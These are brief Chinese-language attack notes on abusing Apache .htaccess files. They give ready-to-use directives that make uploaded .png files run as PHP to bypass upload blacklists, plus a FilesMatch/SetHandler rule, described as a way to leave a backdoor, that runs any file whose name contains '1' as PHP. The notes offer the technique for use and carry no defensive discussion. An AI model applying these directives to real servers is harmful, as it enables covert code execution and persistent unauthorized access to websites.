1、.htaccess文件
2、文件上傳繞過
一般.htaccess可以用來留後門和針對黑名單繞過
創建一個txt寫入(png解析爲php)
AddType application/x-httpd-php .png
另存爲.htaccess
上傳.htaccess 必須是網站根路徑
3、留後門
可以在.htaccess 加入php解析規則
類似於把文件名包含1的解析成php
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
123456.png 就會以php執行
參考文章:
https://www.cnblogs.com/hmbb/p/9689436.html4
https://www.cnblogs.com/feizianquan/p/11109390.html